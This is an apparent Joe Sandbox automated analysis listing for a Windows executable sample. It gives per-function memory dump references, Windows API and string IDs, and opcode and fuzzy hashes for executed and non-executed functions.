                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    • Opcode ID: 14b5ec0f5869d0bd77d79bcd31b71478661534bc047ed1da3425cff9bc9b094f
                                                                                    • Instruction ID: 247515aaa3e077bd55da4ea4a238d2d3b336e7d5ab527196fd8793f010c3a8e0
                                                                                    • Opcode Fuzzy Hash: 14b5ec0f5869d0bd77d79bcd31b71478661534bc047ed1da3425cff9bc9b094f
                                                                                    • Instruction Fuzzy Hash: 1141E736A0874248EA12AF29D14537DE3A0EB66BD5FD41131EF6D0769EDF3DE4828234
                                                                                    Function 00007FF7B8F2AD18 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                    • String ID:
                                                                                    • API String ID: 3947729631-0
                                                                                    • Opcode ID: 7b6bbfe2a65bf5bcf7816375dbb7b800072ef1e55ba0d5e9ecad1d5adacdff7f
                                                                                    • Instruction ID: 20bd21524f11cdbb1f15f020d28d24100eb98566d4437952e54d74b7da81c830
                                                                                    • Opcode Fuzzy Hash: 7b6bbfe2a65bf5bcf7816375dbb7b800072ef1e55ba0d5e9ecad1d5adacdff7f
                                                                                    • Instruction Fuzzy Hash: 7A418231A18A028AFA14BF19985017DE391AF72782FC45535EB0E476DDDE3DE94383A8
                                                                                    Function 00007FF7B8EF12C0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                    • String ID:
                                                                                    • API String ID: 680105476-0
                                                                                    • Opcode ID: d8b7ba03d0ba580a7255f6bedcd3716f38d52d3498efee490019b7d77720db70
                                                                                    • Instruction ID: 055bd6614ae5c7907d758092be1f6d9429667b5c5b6bfd6ca0293eb53bc8dcef
                                                                                    • Opcode Fuzzy Hash: d8b7ba03d0ba580a7255f6bedcd3716f38d52d3498efee490019b7d77720db70
                                                                                    • Instruction Fuzzy Hash: FF21C721A0D74681FA15AF86A400279E250EB26BF0FD40731EB7D07BC9DE7CE0534359
                                                                                    Function 00007FF7B8EF36E0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    • Opcode ID: adf539203e4b5eb5ff374a2eaec0a4ca294eac9c816623df0097ea95e1fee72b
                                                                                    • Instruction ID: 6b9ba2f85c8cf477082365427048769e7977ae857cfbc087ea67a6fbdb741210
                                                                                    • Opcode Fuzzy Hash: adf539203e4b5eb5ff374a2eaec0a4ca294eac9c816623df0097ea95e1fee72b
                                                                                    • Instruction Fuzzy Hash: C5218F36B18586A5FA08FB69D1543E8E310FB62784FD40031E71D076AACF7CE5A6C328
                                                                                    Function 00007FF7B8F3016C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 3215553584-0
                                                                                    • Opcode ID: 1ccbc877d3d82807430c844aa6a9e9ac3197a3ce8b72ab15bec3d0bc61c47e96
                                                                                    • Instruction ID: 0d903ac462ba6540e342c43bc3601d03ae3da2a74decbd6b1827747cd8861d34
                                                                                    • Opcode Fuzzy Hash: 1ccbc877d3d82807430c844aa6a9e9ac3197a3ce8b72ab15bec3d0bc61c47e96
                                                                                    • Instruction Fuzzy Hash: F3113031A1C682CAF610BB58E440579F295FBA5341F940136E79D5779EDF3CE5028728
                                                                                    Function 00007FF7B8EF45C4 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    • Opcode ID: d463a43dc11199747284af769508828d1089d4fbecd79c823e823b0cd634ab66
                                                                                    • Instruction ID: 608ee1751e84999523517de6a13456bb8059badd3cf334249f12c529e7ff9b26
                                                                                    • Opcode Fuzzy Hash: d463a43dc11199747284af769508828d1089d4fbecd79c823e823b0cd634ab66
                                                                                    • Instruction Fuzzy Hash: F501C262E186C545FA10A72CE44126DF361FFEA794FC05331E7AC06A99DF7CE0828718
                                                                                    Function 00007FF7B8EF2380 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName
                                                                                    • String ID:
                                                                                    • API String ID: 1191326365-0
                                                                                    • Opcode ID: ad19b7b2331f908ae39e37604d02b0dcd85f98b62387dee565ad67c3197901ac
                                                                                    • Instruction ID: cd10171da8a8a6dabf0428e6766a95e8725b8fbcedf0ca9d1c69311ff705e4e8
                                                                                    • Opcode Fuzzy Hash: ad19b7b2331f908ae39e37604d02b0dcd85f98b62387dee565ad67c3197901ac
                                                                                    • Instruction Fuzzy Hash: A0012432B28A8585EB009B16E5943AAE360FFA9BC4F840231EB4D47B59DF3CE1958704
                                                                                    Function 00007FF7B8F03244 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1464966427-0
                                                                                    • Opcode ID: 53a927f6c22a7943a225c497b2bc8e3dd13ffe24a07be28bf3058a85aef6c9a4
                                                                                    • Instruction ID: b852ac3e365eeb7f3810a91c5d581d447a139b5d6fac6043e4f493a5a22df2b4
                                                                                    • Opcode Fuzzy Hash: 53a927f6c22a7943a225c497b2bc8e3dd13ffe24a07be28bf3058a85aef6c9a4
                                                                                    • Instruction Fuzzy Hash: 50F081729082414DEA51BF799508178E7609B27BB5F540335DB7C072CFCD28D446C739
                                                                                    Function 00007FF7B8F22250 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7B8F22264
                                                                                      • Part of subcall function 00007FF7B8F24010: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF7B8F24018
                                                                                      • Part of subcall function 00007FF7B8F24010: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF7B8F2401D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                    • String ID:
                                                                                    • API String ID: 1208906642-0
                                                                                    • Opcode ID: f9bddfba605b8112e84862bdc2068b677a698924745f233c7f018f6348c1b0db
                                                                                    • Instruction ID: b2ebcfa2ab86482746b78bb2997230eea088a7715a69df086d54439455f9c75c
                                                                                    • Opcode Fuzzy Hash: f9bddfba605b8112e84862bdc2068b677a698924745f233c7f018f6348c1b0db
                                                                                    • Instruction Fuzzy Hash: 58E0E630C0C20398FEA87EA815122B8C2402F33342ED00078FA2D120DB8E2EA00B263A
                                                                                    Function 00007FF7B8F01B00 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: File
                                                                                    • String ID:
                                                                                    • API String ID: 749574446-0
                                                                                    • Opcode ID: 609dcb8444b8763c75357309dbee6f7c4a699e206bb0708e9f081c8f429d3342
                                                                                    • Instruction ID: d650559c7deb2edb916b58731b0544960389ef86ef4780daa21e3ac89b2e4386
                                                                                    • Opcode Fuzzy Hash: 609dcb8444b8763c75357309dbee6f7c4a699e206bb0708e9f081c8f429d3342
                                                                                    • Instruction Fuzzy Hash: C3E08C62A2055186EB60BB6EC841668D320EF9EB86F881031CF0D47329CE2CC4D68A28
                                                                                    Function 00007FF7B8F01864 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileType
                                                                                    • String ID:
                                                                                    • API String ID: 3081899298-0
                                                                                    • Opcode ID: 6cfa110d5cef1c62e08b81ac8735d8479bd886b62a52d4c4be8f8cb2197252d2
                                                                                    • Instruction ID: 4d06f9a6a04c5e0477ccd53baad2afebccb2fa25111e284aac9ff0ec3bc773bc
                                                                                    • Opcode Fuzzy Hash: 6cfa110d5cef1c62e08b81ac8735d8479bd886b62a52d4c4be8f8cb2197252d2
                                                                                    • Instruction Fuzzy Hash: 75D0C9229098418AEA147B69D85103CA290AF63736FF40720D33A866E5CA1DD59BA224
                                                                                    Function 00007FF7B8F07268 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID:
                                                                                    • API String ID: 1611563598-0
                                                                                    • Opcode ID: cd7659c9ddd24a77d48b55e72de66fd3dd5a193154eaa8ea857c6d2ede7f55eb
                                                                                    • Instruction ID: 0097ed050e45590ec6553d9f478c7d6f8f37b5f55bbb26778c5c1a40ed38801b
                                                                                    • Opcode Fuzzy Hash: cd7659c9ddd24a77d48b55e72de66fd3dd5a193154eaa8ea857c6d2ede7f55eb
                                                                                    • Instruction Fuzzy Hash: F3C08C30F21902C6DE187B2AC98102C93E0BB66B45FA08031C20C81120CE2EC89B8710
                                                                                    Function 00007FF7B8F2E924 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 4292702814-0
                                                                                    • Opcode ID: 62152929e6a143f18d85bcb268ccdc9935d3c3853b6c04fa281412da9c2c3039
                                                                                    • Instruction ID: b0374f89e0bcee366e1a4892605f083e7ad0c6cbaa325d156a77dbbd91470a99
                                                                                    • Opcode Fuzzy Hash: 62152929e6a143f18d85bcb268ccdc9935d3c3853b6c04fa281412da9c2c3039
                                                                                    • Instruction Fuzzy Hash: CEF04434B0960389FE94BEA995113B5E1916F66B82F9C5032EB0D463DBDD1CE5834138
                                                                                    Function 00007FF7B8F014D0 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: 88b333418fbb9a41aad7cb5c738162b265e1cd5aa5de0f0b1c7f33e5cf95fe78
                                                                                    • Instruction ID: da297cff18702f0b3bb49b66cd67ec0fc3c8934dcd10cbdd6a1fc657e3a50be7
                                                                                    • Opcode Fuzzy Hash: 88b333418fbb9a41aad7cb5c738162b265e1cd5aa5de0f0b1c7f33e5cf95fe78
                                                                                    • Instruction Fuzzy Hash: 58F0A972A045425DFB249F34D444779F650DB26B7AF894334D77E051D8CF28D4D68314
                                                                                    Function 00007FF7B8F2C7F8 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 4292702814-0
                                                                                    • Opcode ID: ed338fc11603220dc29deab5a9171b6a84f653f499a0fe3b8364b9ccbd60ae55
                                                                                    • Instruction ID: 65cbb6a8b800e8f4136b175dc4470b19399029f9688aec1ea9439523511be2c0
                                                                                    • Opcode Fuzzy Hash: ed338fc11603220dc29deab5a9171b6a84f653f499a0fe3b8364b9ccbd60ae55
                                                                                    • Instruction Fuzzy Hash: 42F03A30E0820289FA643FA9A9012F5D1904F66BA2F988234EF2E452C9DE6CA4824178

                                                                                    Non-executed Functions

                                                                                    Function 00007FF7B8EFB8F0 Relevance: 53.3, APIs: 26, Strings: 4, Instructions: 781fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$wcscpy$CloseDirectoryFileHandleRemove$CreateErrorLast$Concurrency::cancel_current_taskControlCurrentDeleteDeviceProcess
                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                    • API String ID: 938441313-3508440684
                                                                                    • Opcode ID: 69c87270fa75010854547db0ea3fcc1c9a49fc0be42d48a5f3edef8f674e51d5
                                                                                    • Instruction ID: c21bb19c37892f620542e21d535075954b208f88d2266828b20e79d519087ddd
                                                                                    • Opcode Fuzzy Hash: 69c87270fa75010854547db0ea3fcc1c9a49fc0be42d48a5f3edef8f674e51d5
                                                                                    • Instruction Fuzzy Hash: 0D728462F1864185FA00EB78D4452EDE361AFA67A4FD04231EB6C566DDDE3CE582C318
                                                                                    Function 00007FF7B8F0E76C Relevance: 41.5, APIs: 21, Strings: 2, Instructions: 1203COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Concurrency::cancel_current_task
                                                                                    • String ID: %ls$%s: %s
                                                                                    • API String ID: 4078585566-2259941744
                                                                                    • Opcode ID: 5316538c3acc0073b16b98db0c7bd9415f0c0fe39fbd25c30d7f25bf7cf9e4bf
